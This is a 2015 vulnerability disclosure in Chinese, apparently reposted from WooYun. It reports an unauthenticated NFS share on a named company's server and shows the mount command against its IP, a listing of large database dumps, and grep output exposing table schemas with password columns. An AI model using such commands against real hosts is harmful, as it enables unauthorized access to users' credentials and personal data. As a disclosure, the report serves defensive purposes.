记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

逛某服务未授权访问导致25G数据库信息存在被获取的风险(仅测试)

2015-01-17 20:25

nfs 未授权访问

mount -t nfs 115.236.20.3:/home/huangm ssd

code 区域
[root@localhost ~]# ping dev.guang.com

PING dev.guang.com (115.236.20.3) 56(84) bytes of data.

64 bytes from 115.236.20.3: icmp_seq=1 ttl=48 time=52.2 ms





code 区域
[root@localhost ssd]# ls -lh

total 29G

-rw-r--r-- 1 nobody nobody 795 Jan 6 03:09 aphrodite_2015-01-06.sql

-rw-r--r-- 1 nobody nobody 792 Jan 6 03:09 apollo_2015-01-06.sql

-rw-r--r-- 1 nobody nobody 792 Jan 6 03:09 athena_2015-01-06.sql

drwxr-xr-x 9 nobody nobody 4.0K Jan 8 09:29 cpc-backend

drwxr-xr-x 8 nobody nobody 4.0K Jan 8 09:36 cpc-consumer

-rw-r--r-- 1 nobody nobody 87M Jan 6 03:09 crm_2015-01-06.sql

-rw-r--r-- 1 nobody nobody 25G Jan 6 03:09 guang_2015-01-06.sql

-rw-r--r-- 1 nobody nobody 4.6G Jan 6 15:19 guang_2015-01-06.tar.gz

drwxrwxrwx 12 nobody nobody 4.0K Dec 31 10:18 guang-monitor

drwxrwxrwx 12 nobody nobody 4.0K Dec 29 21:57 guang-scheduler

-rw------- 1 nobody nobody 0 Jan 6 15:40 nohup.out





不知道数据内容是啥,眼瞎,不敢看,crm估计也是啥重要数据

漏洞证明:

简单验证下里面有用户数据

code 区域
[root@localhost ssd]# grep 'password' crm_2015-01-06.sql -B 10 -A 10

-- Table structure for table `seller`

--



DROP TABLE IF EXISTS `seller`;

/*!40101 SET @saved_cs_client = @@character_set_client */;

/*!40101 SET character_set_client = utf8 */;

CREATE TABLE `seller` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT,

`name` varchar(10) DEFAULT NULL,

`email` varchar(45) DEFAULT NULL,

`password` varchar(32) DEFAULT NULL,

`role` tinyint(4) DEFAULT NULL COMMENT '角色:0-管理员,1-普通销售人员',

`unsign_client_num` smallint(11) DEFAULT NULL COMMENT '未签约商家数',

`create_time` datetime DEFAULT NULL,

`modify_time` datetime DEFAULT NULL,

`last_login_time` datetime DEFAULT NULL COMMENT '最后登陆时间',

`admin_id` int(11) DEFAULT NULL,

PRIMARY KEY (`id`),

UNIQUE KEY `email` (`email`)

) ENGINE=InnoDB AUTO_INCREMENT=60 DEFAULT CHARSET=utf8 COMMENT='销售人员';

/*!40101 SET character_set_client = @saved_cs_client */;



25G的库

code 区域
[root@localhost ssd]# head -n 1001 guang_2015-01-06.sql|grep 'password' -B 10 -A 10



--

-- Table structure for table `cpc_cellphone_login`

--



DROP TABLE IF EXISTS `cpc_cellphone_login`;

/*!40101 SET @saved_cs_client = @@character_set_client */;

/*!40101 SET character_set_client = utf8 */;

CREATE TABLE `cpc_cellphone_login` (

`cellphone` varchar(11) NOT NULL,

`password` varchar(50) DEFAULT NULL COMMENT '登录密码',

`create_time` datetime DEFAULT NULL,

PRIMARY KEY (`cellphone`)

) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='cpc手机登陆';

/*!40101 SET character_set_client = @saved_cs_client */;



--

-- Dumping data for table `cpc_cellphone_login`

--



LOCK TABLES `cpc_cellphone_login` WRITE;

--



--

-- Table structure for table `cpc_cellphone_login_bak20141106`

--



DROP TABLE IF EXISTS `cpc_cellphone_login_bak20141106`;

/*!40101 SET @saved_cs_client = @@character_set_client */;

/*!40101 SET character_set_client = utf8 */;

CREATE TABLE `cpc_cellphone_login_bak20141106` (

`cellphone` varchar(11) NOT NULL,

`password` varchar(50) DEFAULT NULL COMMENT '登录密码',

`create_time` datetime DEFAULT NULL

) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*!40101 SET character_set_client = @saved_cs_client */;



--

-- Dumping data for table `cpc_cellphone_login_bak20141106`

--



LOCK TABLES `cpc_cellphone_login_bak20141106` WRITE;

/*!40000 ALTER TABLE `cpc_cellphone_login_bak20141106` DISABLE KEYS */;

修复方案:

访问控制


知识来源: www.wooyun.org/bugs/wooyun-2015-091468

阅读:237349 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“逛某服务未授权访问导致25G数据库信息存在被获取的风险(仅测试)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云